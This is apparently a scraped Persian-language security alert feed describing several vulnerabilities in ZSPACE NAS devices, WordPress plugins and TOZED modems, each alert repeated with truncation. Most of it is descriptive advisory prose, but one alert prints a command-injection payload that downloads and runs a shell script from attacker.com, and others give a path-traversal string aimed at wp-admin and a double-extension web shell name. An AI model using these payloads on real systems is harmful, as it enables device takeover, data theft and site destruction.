🚨 New Vulnerability Alert: CVE-2025-14107
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری | هشدار امنیتی
شناسه:
---
📄 شرح آسیبپذیری:
یک ضعف امنیتی حیاتی از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه
این آسیبپذیری در تابع
حمله به صورت از راه دور قابل اجرا بوده و کد بهرهبرداری (Exploit) آن به صورت عمومی منتشر شده است. شرکت سازنده به هشدارهای امنیتی پاسخی نداده و در حال حاضر هیچ وصله امنیتی برای این مورد منتشر نشده است.
💥 سطح تأثیر:
تأثیر این آسیبپذیری بسیار بالا (Critical) ارزیابی میشود. بهرهبرداری موفقیتآمیز میتواند منجر به موارد زیر گردد:
- اجرای دستورات دلخواه از راه دور با بالاترین سطح دسترسی (root).
- سرقت، حذف و یا رمزنگاری تمامی اطلاعات ذخیره شده بر روی دستگاه.
- کنترل کامل دستگاه و استفاده از آن برای نفوذ به سایر بخشهای شبکه داخلی (Pivoting).
- تبدیل دستگاه به بخشی از یک شبکه مخرب (Botnet) برای انجام حملات دیگر.
🎭 سناریوی حمله:
۱. مهاجم با استفاده از ابزارهای اسکن، دستگاههای ZSPACE Q2C آسیبپذیر که در اینترنت قابل دسترس هستند را شناسایی میکند.
۲. سپس یک درخواست
۳. وب سرور دستگاه بدون اعتبارسنجی ورودی، دستور تزریقشده را مستقیماً بر روی سیستمعامل اجرا میکند.
۴. در نتیجه، مهاجم به دستگاه نفوذ کرده و کنترل کامل آن را برای سرقت اطلاعات یا اجرای حملات بعدی به دست میآورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری | هشدار امنیتی
شناسه:
CVE-2025-14107---
📄 شرح آسیبپذیری:
یک ضعف امنیتی حیاتی از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه
1.1.0210050 شناسایی شده است.این آسیبپذیری در تابع
zfilev2_api.SafeStatus که از طریق ارسال درخواست HTTP POST به مسیر /v2/file/safe/status قابل دسترس است، وجود دارد. مهاجم میتواند با دستکاری پارامتر safe_dir و تزریق دستورات مخرب، کنترل کامل سیستمعامل دستگاه را به دست گیرد.حمله به صورت از راه دور قابل اجرا بوده و کد بهرهبرداری (Exploit) آن به صورت عمومی منتشر شده است. شرکت سازنده به هشدارهای امنیتی پاسخی نداده و در حال حاضر هیچ وصله امنیتی برای این مورد منتشر نشده است.
💥 سطح تأثیر:
تأثیر این آسیبپذیری بسیار بالا (Critical) ارزیابی میشود. بهرهبرداری موفقیتآمیز میتواند منجر به موارد زیر گردد:
- اجرای دستورات دلخواه از راه دور با بالاترین سطح دسترسی (root).
- سرقت، حذف و یا رمزنگاری تمامی اطلاعات ذخیره شده بر روی دستگاه.
- کنترل کامل دستگاه و استفاده از آن برای نفوذ به سایر بخشهای شبکه داخلی (Pivoting).
- تبدیل دستگاه به بخشی از یک شبکه مخرب (Botnet) برای انجام حملات دیگر.
🎭 سناریوی حمله:
۱. مهاجم با استفاده از ابزارهای اسکن، دستگاههای ZSPACE Q2C آسیبپذیر که در اینترنت قابل دسترس هستند را شناسایی میکند.
۲. سپس یک درخواست
HTTP POST دستکاریشده به سرور NAS ارسال میکند. در این درخواست، پارامتر safe_dir حاوی دستورات مخرب سیستمعامل است (برای مثال، دستوری برای دانلود و اجرای یک درب پشتی یا Backdoor).۳. وب سرور دستگاه بدون اعتبارسنجی ورودی، دستور تزریقشده را مستقیماً بر روی سیستمعامل اجرا میکند.
۴. در نتیجه، مهاجم به دستگاه نفوذ کرده و کنترل کامل آن را برای سرقت اطلاعات یا اجرای حملات بعدی به دست میآورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14108
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14108
توضیحات آسیبپذیری:
یک آسیبپذیری از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل
مهاجم از راه دور میتواند با دستکاری پارامتر
---
تاثیرات:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه اجرای کد از راه دور (Remote Code Execution - RCE) را با سطح دسترسی پروسهی وب سرور دستگاه میدهد. این موضوع میتواند منجر به نتایج فاجعهباری شود، از جمله:
- کنترل کامل دستگاه و دسترسی به تمامی فایلهای ذخیره شده.
- سرقت و استخراج اطلاعات حساس و محرمانه کاربران.
- نصب بدافزار، باجافزار (Ransomware) یا ایجاد درهای پشتی (Backdoor) برای دسترسیهای آتی.
- استفاده از دستگاه آلوده به عنوان نقطهای برای نفوذ و حمله به سایر دستگاههای موجود در شبکه داخلی.
---
سناریوی حمله:
یک مهاجم میتواند با دنبال کردن مراحل زیر از این آسیبپذیری بهرهبرداری کند:
۱. ابتدا، مهاجم با استفاده از اسکنرهای اینترنتی، دستگاههای
۲. سپس، یک درخواست
۳. وب سرور دستگاه بدون اعتبارسنجی کافی، این ورودی را پردازش کرده و دستورات تزریق شده توسط مهاجم را بر روی سیستم اجرا میکند. این عمل منجر به دانلود و اجرای یک شل مخرب بر روی دستگاه NAS میشود.
۴. در نهایت، مهاجم از طریق شل ایجاد شده، کنترل کامل دستگاه را در دست گرفته و میتواند اقدامات خرابکارانه خود را آغاز کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14108
توضیحات آسیبپذیری:
یک آسیبپذیری از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل
ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است. این ضعف امنیتی در تابع zfilev2_api.OpenSafe واقع در مسیر /v2/file/safe/open وجود دارد که از طریق درخواستهای HTTP POST قابل دسترسی است.مهاجم از راه دور میتواند با دستکاری پارامتر
safe_dir، دستورات دلخواه خود را بر روی سیستمعامل دستگاه هدف اجرا کند. کد بهرهبرداری (Exploit) برای این آسیبپذیری به صورت عمومی منتشر شده و فروشنده محصول علیرغم اطلاعرسانی، هیچ واکنشی نشان نداده است.---
تاثیرات:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه اجرای کد از راه دور (Remote Code Execution - RCE) را با سطح دسترسی پروسهی وب سرور دستگاه میدهد. این موضوع میتواند منجر به نتایج فاجعهباری شود، از جمله:
- کنترل کامل دستگاه و دسترسی به تمامی فایلهای ذخیره شده.
- سرقت و استخراج اطلاعات حساس و محرمانه کاربران.
- نصب بدافزار، باجافزار (Ransomware) یا ایجاد درهای پشتی (Backdoor) برای دسترسیهای آتی.
- استفاده از دستگاه آلوده به عنوان نقطهای برای نفوذ و حمله به سایر دستگاههای موجود در شبکه داخلی.
---
سناریوی حمله:
یک مهاجم میتواند با دنبال کردن مراحل زیر از این آسیبپذیری بهرهبرداری کند:
۱. ابتدا، مهاجم با استفاده از اسکنرهای اینترنتی، دستگاههای
ZSPACE Q2C NAS آسیبپذیر را که به صورت عمومی در دسترس هستند، شناسایی میکند.۲. سپس، یک درخواست
HTTP POST مخرب به اندپوینت /v2/file/safe/open ارسال میکند. در این درخواست، مقدار پارامتر safe_dir به گونهای دستکاری میشود که شامل دستورات سیستمعامل باشد. برای مثال:safe_dir=any_directory_name; wget https://attacker.com/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh۳. وب سرور دستگاه بدون اعتبارسنجی کافی، این ورودی را پردازش کرده و دستورات تزریق شده توسط مهاجم را بر روی سیستم اجرا میکند. این عمل منجر به دانلود و اجرای یک شل مخرب بر روی دستگاه NAS میشود.
۴. در نهایت، مهاجم از طریق شل ایجاد شده، کنترل کامل دستگاه را در دست گرفته و میتواند اقدامات خرابکارانه خود را آغاز کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12673
🔴 Risk Level: CRITICAL (Score: 9.8)
🐞 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) با شناسه
این آسیبپذیری ناشی از عدم وجود اعتبارسنجی صحیح برای نوع فایلها در تابع
💥 تأثیر:
مهمترین و خطرناکترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) است. یک مهاجم با بهرهبرداری موفق از این ضعف امنیتی میتواند کنترل کامل سرور را به دست آورد.
سایر تأثیرات احتمالی عبارتند از:
- سرقت اطلاعات حساس کاربران، پایگاه داده و فایلهای پیکربندی.
- نصب بدافزار، باجافزار یا استفاده از سرور برای حملات DDoS.
- تغییر چهره وبسایت (Defacement) و آسیب به اعتبار برند.
- ایجاد دسترسیهای پایدار (Backdoor) برای حملات آینده.
🎬 سناریو:
یک سناریوی حمله میتواند به شرح زیر باشد:
۱. مهاجم با ابزارهای اسکن خودکار، وبسایتهای وردپرسی را که از نسخه آسیبپذیر پلاگین `Flex QR Code Generator` استفاده میکنند، شناسایی میکند.
۲. سپس، یک فایل مخرب مانند یک وبشل (Web Shell) با پسوند
۳. مهاجم با ارسال یک درخواست دستکاریشده به تابع آسیبپذیر
۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را در مرورگر خود باز میکند. سرور وب، کدهای PHP موجود در فایل را اجرا کرده و در نتیجه، مهاجم به یک رابط کاربری برای اجرای دستورات دلخواه روی سرور دسترسی پیدا میکند و کنترل کامل آن را در اختیار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
🐞 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) با شناسه
CVE-2025-12673 در پلاگین Flex QR Code Generator برای وردپرس شناسایی شده است. تمام نسخههای این پلاگین تا نسخه 1.2.6 (شامل این نسخه) تحت تأثیر این ضعف امنیتی قرار دارند.این آسیبپذیری ناشی از عدم وجود اعتبارسنجی صحیح برای نوع فایلها در تابع
update_qr_code() است. این نقص به مهاجمان احراز هویت نشده اجازه میدهد تا هر نوع فایلی (مانند یک وبشل مخرب) را بر روی سرور سایت آسیبپذیر آپلود کنند.💥 تأثیر:
مهمترین و خطرناکترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) است. یک مهاجم با بهرهبرداری موفق از این ضعف امنیتی میتواند کنترل کامل سرور را به دست آورد.
سایر تأثیرات احتمالی عبارتند از:
- سرقت اطلاعات حساس کاربران، پایگاه داده و فایلهای پیکربندی.
- نصب بدافزار، باجافزار یا استفاده از سرور برای حملات DDoS.
- تغییر چهره وبسایت (Defacement) و آسیب به اعتبار برند.
- ایجاد دسترسیهای پایدار (Backdoor) برای حملات آینده.
🎬 سناریو:
یک سناریوی حمله میتواند به شرح زیر باشد:
۱. مهاجم با ابزارهای اسکن خودکار، وبسایتهای وردپرسی را که از نسخه آسیبپذیر پلاگین `Flex QR Code Generator` استفاده میکنند، شناسایی میکند.
۲. سپس، یک فایل مخرب مانند یک وبشل (Web Shell) با پسوند
.php آماده میکند. این فایل حاوی کدهایی است که به مهاجم اجازه اجرای دستورات روی سرور را میدهد.۳. مهاجم با ارسال یک درخواست دستکاریشده به تابع آسیبپذیر
update_qr_code()، فایل وبشل خود را بدون نیاز به هیچگونه نام کاربری یا رمز عبور، بر روی سرور آپلود میکند.۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را در مرورگر خود باز میکند. سرور وب، کدهای PHP موجود در فایل را اجرا کرده و در نتیجه، مهاجم به یک رابط کاربری برای اجرای دستورات دلخواه روی سرور دسترسی پیدا میکند و کنترل کامل آن را در اختیار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13377
🔴 Risk Level: CRITICAL (Score: 9.6)
تحلیل آسیبپذیری | حذف پوشه دلخواه در افزونه 10Web Booster وردپرس
شناسه:
📄 توضیحات آسیبپذیری:
آسیبپذیری از نوع "حذف پوشه دلخواه" (Arbitrary Folder Deletion) در افزونه محبوب وردپرس با نام 10Web Booster – Website speed optimization, Cache & Page Speed optimizer شناسایی شده است.
این ضعف امنیتی در تمام نسخههای
این نقص به مهاجمان احرازهویت شده (حتی با کمترین سطح دسترسی مانند Subscriber) اجازه میدهد تا پوشههای دلخواه را روی سرور حذف کنند.
💥 تاثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به عواقب جدی برای وبسایت شود، از جمله:
🔻 از دست رفتن دادهها (Data Loss): مهاجم میتواند پوشههای حیاتی مانند
🔻 از کار افتادن سرویس (Denial of Service - DoS): با حذف پوشههای اصلی وردپرس مانند
🔻 آسیب به یکپارچگی سایت: حذف پوشههای مربوط به قالبها (themes) یا سایر افزونهها (plugins) میتواند ساختار و عملکرد سایت را مختل کند.
🎭 سناریو حمله:
یک مهاجم با سطح دسترسی Subscriber (مشترک) وارد وبسایت هدف میشود. سپس با ارسال یک درخواست دستکاریشده به سرور که تابع آسیبپذیر را فراخوانی میکند، از تکنیک پیمایش مسیر (Path Traversal) مانند
برای مثال، مهاجم میتواند درخواستی ارسال کند که باعث شود سرور مسیر
به دلیل عدم اعتبارسنجی صحیح، افزونه فریب خورده و به جای پوشه کش، پوشه حیاتی
---
✅ توصیههای امنیتی:
🔸 فوراً افزونه 10Web Booster را به آخرین نسخه منتشر شده بهروزرسانی کنید.
🔸 در صورتی که بهروزرسانی در دسترس نیست، این افزونه را تا زمان ارائه وصله امنیتی، غیرفعال و حذف نمایید.
🔸 همواره از فایلها و پایگاه داده وبسایت خود نسخه پشتیبان تهیه کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.6)
تحلیل آسیبپذیری | حذف پوشه دلخواه در افزونه 10Web Booster وردپرس
شناسه:
CVE-2025-13377📄 توضیحات آسیبپذیری:
آسیبپذیری از نوع "حذف پوشه دلخواه" (Arbitrary Folder Deletion) در افزونه محبوب وردپرس با نام 10Web Booster – Website speed optimization, Cache & Page Speed optimizer شناسایی شده است.
این ضعف امنیتی در تمام نسخههای
2.32.7 و پایینتر وجود دارد. مشکل اصلی از تابع get_cache_dir_for_page_from_url() نشأت میگیرد که در آن، اعتبارسنجی مسیر فایل به درستی انجام نمیشود.این نقص به مهاجمان احرازهویت شده (حتی با کمترین سطح دسترسی مانند Subscriber) اجازه میدهد تا پوشههای دلخواه را روی سرور حذف کنند.
💥 تاثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به عواقب جدی برای وبسایت شود، از جمله:
🔻 از دست رفتن دادهها (Data Loss): مهاجم میتواند پوشههای حیاتی مانند
wp-content/uploads که حاوی فایلهای رسانهای کاربران است را حذف کند.🔻 از کار افتادن سرویس (Denial of Service - DoS): با حذف پوشههای اصلی وردپرس مانند
wp-admin یا wp-includes، وبسایت به طور کامل از دسترس خارج شده و دچار اختلال در سرویسدهی میشود.🔻 آسیب به یکپارچگی سایت: حذف پوشههای مربوط به قالبها (themes) یا سایر افزونهها (plugins) میتواند ساختار و عملکرد سایت را مختل کند.
🎭 سناریو حمله:
یک مهاجم با سطح دسترسی Subscriber (مشترک) وارد وبسایت هدف میشود. سپس با ارسال یک درخواست دستکاریشده به سرور که تابع آسیبپذیر را فراخوانی میکند، از تکنیک پیمایش مسیر (Path Traversal) مانند
../ استفاده میکند تا مسیر یک پوشه حیاتی را هدف قرار دهد.برای مثال، مهاجم میتواند درخواستی ارسال کند که باعث شود سرور مسیر
/wp-content/plugins/10web-booster/cache/../../../../wp-admin/ را به عنوان مسیر حذف کش در نظر بگیرد.به دلیل عدم اعتبارسنجی صحیح، افزونه فریب خورده و به جای پوشه کش، پوشه حیاتی
wp-admin را به طور کامل حذف میکند. در نتیجه، پنل مدیریت وردپرس از دسترس خارج شده و سایت با اختلال جدی مواجه میشود.---
✅ توصیههای امنیتی:
🔸 فوراً افزونه 10Web Booster را به آخرین نسخه منتشر شده بهروزرسانی کنید.
🔸 در صورتی که بهروزرسانی در دسترس نیست، این افزونه را تا زمان ارائه وصله امنیتی، غیرفعال و حذف نمایید.
🔸 همواره از فایلها و پایگاه داده وبسایت خود نسخه پشتیبان تهیه کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12966
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری CVE-2025-12966
افزونه All-in-One Video Gallery وردپرس
📌 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه
نقطه ضعف اصلی، عدم اعتبارسنجی صحیح نوع فایل (File Type Validation) در تابع
💥 تأثیر:
تأثیر اصلی این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. مهاجم با آپلود یک فایل مخرب (مانند یک وبشل - Web Shell) میتواند کنترل کامل سرور میزبان وبسایت را در دست بگیرد.
پیامدهای این حمله میتواند شامل موارد زیر باشد:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال هرزنامه)
- نصب بدافزار و استخراج ارز دیجیتال (Cryptojacking)
🕵️♂️ سناریوی حمله:
۱. مهاجم ابتدا یک حساب کاربری با سطح دسترسی "نویسنده" (Author) یا بالاتر در سایت وردپرسی هدف به دست میآورد. (این کار میتواند از طریق فیشینگ، حملات Brute-force یا سوءاستفاده از یک حساب کاربری قانونی انجام شود).
۲. سپس، یک فایل مخرب مانند یک وبشل با پسوند
۳. مهاجم با استفاده از قابلیت آسیبپذیر در افزونه، فایل
۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را پیدا کرده و آن را در مرورگر خود باز میکند.
۵. با باز شدن آدرس، کدهای مخرب روی سرور اجرا شده و مهاجم به سرور دسترسی کامل پیدا میکند و میتواند هر دستوری را اجرا نماید.
---
💡 توصیههای امنیتی:
- بهروزرسانی فوری: در اسرع وقت افزونه All-in-One Video Gallery را به آخرین نسخه امن منتشر شده آپدیت کنید.
- مدیریت دسترسی: سطح دسترسی کاربران را بازبینی کرده و از اعطای دسترسیهای غیرضروری به کاربران نامعتبر خودداری کنید.
- استفاده از WAF: یک فایروال برنامه وب (Web Application Firewall) میتواند به شناسایی و مسدودسازی تلاشها برای آپلود فایلهای مخرب کمک کند.
- بررسی فایلها: سرور خود را برای یافتن هرگونه فایل مشکوک و ناشناس، بهویژه در پوشههای آپلود، اسکن کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری CVE-2025-12966
افزونه All-in-One Video Gallery وردپرس
📌 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه
All-in-One Video Gallery برای وردپرس شناسایی شده است. این نقص امنیتی نسخههای 4.5.4 تا 4.5.7 این افزونه را تحت تأثیر قرار میدهد.نقطه ضعف اصلی، عدم اعتبارسنجی صحیح نوع فایل (File Type Validation) در تابع
resolve_import_directory() است. این حفره به مهاجمان احرازهویتشده با سطح دسترسی "نویسنده" (Author) و بالاتر اجازه میدهد تا فایلهای دلخواه خود، از جمله فایلهای اجرایی مخرب، را بر روی سرور سایت آسیبپذیر آپلود کنند.💥 تأثیر:
تأثیر اصلی این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. مهاجم با آپلود یک فایل مخرب (مانند یک وبشل - Web Shell) میتواند کنترل کامل سرور میزبان وبسایت را در دست بگیرد.
پیامدهای این حمله میتواند شامل موارد زیر باشد:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال هرزنامه)
- نصب بدافزار و استخراج ارز دیجیتال (Cryptojacking)
🕵️♂️ سناریوی حمله:
۱. مهاجم ابتدا یک حساب کاربری با سطح دسترسی "نویسنده" (Author) یا بالاتر در سایت وردپرسی هدف به دست میآورد. (این کار میتواند از طریق فیشینگ، حملات Brute-force یا سوءاستفاده از یک حساب کاربری قانونی انجام شود).
۲. سپس، یک فایل مخرب مانند یک وبشل با پسوند
.php آماده میکند. این فایل حاوی کدهایی برای اجرای دستورات روی سرور است.۳. مهاجم با استفاده از قابلیت آسیبپذیر در افزونه، فایل
shell.php خود را آپلود میکند. به دلیل نبود اعتبارسنجی، سیستم فایل مخرب را میپذیرد.۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را پیدا کرده و آن را در مرورگر خود باز میکند.
۵. با باز شدن آدرس، کدهای مخرب روی سرور اجرا شده و مهاجم به سرور دسترسی کامل پیدا میکند و میتواند هر دستوری را اجرا نماید.
---
💡 توصیههای امنیتی:
- بهروزرسانی فوری: در اسرع وقت افزونه All-in-One Video Gallery را به آخرین نسخه امن منتشر شده آپدیت کنید.
- مدیریت دسترسی: سطح دسترسی کاربران را بازبینی کرده و از اعطای دسترسیهای غیرضروری به کاربران نامعتبر خودداری کنید.
- استفاده از WAF: یک فایروال برنامه وب (Web Application Firewall) میتواند به شناسایی و مسدودسازی تلاشها برای آپلود فایلهای مخرب کمک کند.
- بررسی فایلها: سرور خود را برای یافتن هرگونه فایل مشکوک و ناشناس، بهویژه در پوشههای آپلود، اسکن کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13065
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-13065
📝 توضیح آسیبپذیری:
افزونه
💥 تأثیرات و پیامدها:
مهمترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (RCE) است. این بدان معناست که مهاجم میتواند کنترل کامل وبسایت و سرور میزبان را به دست گیرد. سایر پیامدهای احتمالی عبارتند از: سرقت اطلاعات حساس کاربران و پایگاه داده، نصب بدافزار و دربهای پشتی (Backdoors) برای دسترسیهای آتی، و سوءاستفاده از سرور برای حملات دیگر مانند DDoS یا استخراج رمزارز.
👨💻 سناریوی حمله:
یک مهاجم با سطح دسترسی کاربری حداقل
مهاجم یک فایل مخرب (مانند یک وبشل به زبان PHP) ایجاد کرده و نام آن را با پسوند دوگانه ذخیره میکند؛ برای مثال:
سپس با استفاده از قابلیت ایمپورت در افزونه Starter Templates، اقدام به آپلود این فایل جعلی میکند.
به دلیل ضعف در اعتبارسنجی، افزونه فریب خورده و فایل را به عنوان یک فایل
در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده، کد مخرب خود را روی سرور اجرا کرده و به وبسایت و سرور تسلط کامل پیدا میکند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-13065
📝 توضیح آسیبپذیری:
افزونه
Starter Templates برای وردپرس در تمامی نسخهها تا نسخه 4.4.41 (شامل این نسخه) دارای آسیبپذیری از نوع آپلود فایل دلخواه (Arbitrary File Upload) است. علت اصلی این مشکل، اعتبارسنجی ناکافی نوع فایلهای WXR است. این نقص به مهاجم اجازه میدهد تا با استفاده از فایلهایی با پسوند دوگانه (مانند file.php.xml)، مکانیزمهای امنیتی را دور زده و فایل مخرب خود را به عنوان یک فایل WXR معتبر آپلود کند. این آسیبپذیری به مهاجمان احرازهویتشده با سطح دسترسی نویسنده (author) و بالاتر، امکان آپلود فایلهای دلخواه روی سرور سایت را میدهد که میتواند منجر به اجرای کد از راه دور (Remote Code Execution) شود.💥 تأثیرات و پیامدها:
مهمترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (RCE) است. این بدان معناست که مهاجم میتواند کنترل کامل وبسایت و سرور میزبان را به دست گیرد. سایر پیامدهای احتمالی عبارتند از: سرقت اطلاعات حساس کاربران و پایگاه داده، نصب بدافزار و دربهای پشتی (Backdoors) برای دسترسیهای آتی، و سوءاستفاده از سرور برای حملات دیگر مانند DDoS یا استخراج رمزارز.
👨💻 سناریوی حمله:
یک مهاجم با سطح دسترسی کاربری حداقل
author وارد پیشخوان وردپرس میشود.مهاجم یک فایل مخرب (مانند یک وبشل به زبان PHP) ایجاد کرده و نام آن را با پسوند دوگانه ذخیره میکند؛ برای مثال:
shell.php.xml.سپس با استفاده از قابلیت ایمپورت در افزونه Starter Templates، اقدام به آپلود این فایل جعلی میکند.
به دلیل ضعف در اعتبارسنجی، افزونه فریب خورده و فایل را به عنوان یک فایل
.xml معتبر شناسایی و روی سرور آپلود میکند.در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده، کد مخرب خود را روی سرور اجرا کرده و به وبسایت و سرور تسلط کامل پیدا میکند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14126
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری:
🔎 شرح آسیبپذیری:
یک آسیبپذیری با شناسه
⚠️ تأثیر و پیامدها:
مهاجمی که به شبکه محلی (برای مثال، از طریق اتصال به Wi-Fi) دسترسی داشته باشد، میتواند با استفاده از این اعتبارنامههای افشاشده، به پنل مدیریتی مودم دسترسی کامل و در سطح ادمین پیدا کند. این سطح از دسترسی به مهاجم اجازه میدهد تا اقدامات مخرب زیر را انجام دهد:
- تغییر کامل تنظیمات مودم، از جمله رمز عبور Wi-Fi.
- شنود و نظارت بر کل ترافیک اینترنت کاربران متصل به شبکه.
- هدایت کاربران به وبسایتهای جعلی و فیشینگ از طریق تغییر تنظیمات DNS.
- استفاده از مودم به عنوان نقطهای برای اجرای حملات بیشتر علیه سایر دستگاههای موجود در شبکه.
🎯 سناریوی حمله:
۱. مهاجم ابتدا به شبکه Wi-Fi محلی متصل میشود (مثلاً با حدس زدن رمز عبور یا به عنوان یک کاربر مهمان).
۲. سپس آدرس پنل مدیریتی مودم (معمولاً
۳. با استفاده از نام کاربری و رمز عبور ثابتی که به صورت عمومی از طریق اکسپلویت منتشر شده است، به پنل مدیریتی وارد میشود.
۴. در این مرحله، مهاجم کنترل کامل بر روی مودم و ترافیک شبکه را در اختیار دارد و میتواند به راحتی اهداف مخرب خود را پیادهسازی کند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری:
CVE-2025-14126🔎 شرح آسیبپذیری:
یک آسیبپذیری با شناسه
CVE-2025-14126 در مودمهای TOZED مدلهای ZLT M30S و ZLT M30S PRO با نسخههای فریمور 1.47 و 3.09.06 شناسایی شده است. این ضعف امنیتی به دلیل وجود اعتبارنامههای از پیشتعیینشده (Hard-coded Credentials) در یکی از توابع بخش رابط وب (Web Interface) دستگاه رخ میدهد. این بدان معناست که یک نام کاربری و رمز عبور ثابت و غیرقابل تغییر در نرمافزار مودم کدنویسی شده است. حمله برای بهرهبرداری از این آسیبپذیری باید از داخل شبکه محلی (LAN) انجام شود. اکسپلویت مربوط به این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده به هشدارهای امنیتی پاسخی نداده است.⚠️ تأثیر و پیامدها:
مهاجمی که به شبکه محلی (برای مثال، از طریق اتصال به Wi-Fi) دسترسی داشته باشد، میتواند با استفاده از این اعتبارنامههای افشاشده، به پنل مدیریتی مودم دسترسی کامل و در سطح ادمین پیدا کند. این سطح از دسترسی به مهاجم اجازه میدهد تا اقدامات مخرب زیر را انجام دهد:
- تغییر کامل تنظیمات مودم، از جمله رمز عبور Wi-Fi.
- شنود و نظارت بر کل ترافیک اینترنت کاربران متصل به شبکه.
- هدایت کاربران به وبسایتهای جعلی و فیشینگ از طریق تغییر تنظیمات DNS.
- استفاده از مودم به عنوان نقطهای برای اجرای حملات بیشتر علیه سایر دستگاههای موجود در شبکه.
🎯 سناریوی حمله:
۱. مهاجم ابتدا به شبکه Wi-Fi محلی متصل میشود (مثلاً با حدس زدن رمز عبور یا به عنوان یک کاربر مهمان).
۲. سپس آدرس پنل مدیریتی مودم (معمولاً
192.168.1.1) را در مرورگر خود باز میکند.۳. با استفاده از نام کاربری و رمز عبور ثابتی که به صورت عمومی از طریق اکسپلویت منتشر شده است، به پنل مدیریتی وارد میشود.
۴. در این مرحله، مهاجم کنترل کامل بر روی مودم و ترافیک شبکه را در اختیار دارد و میتواند به راحتی اهداف مخرب خود را پیادهسازی کند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
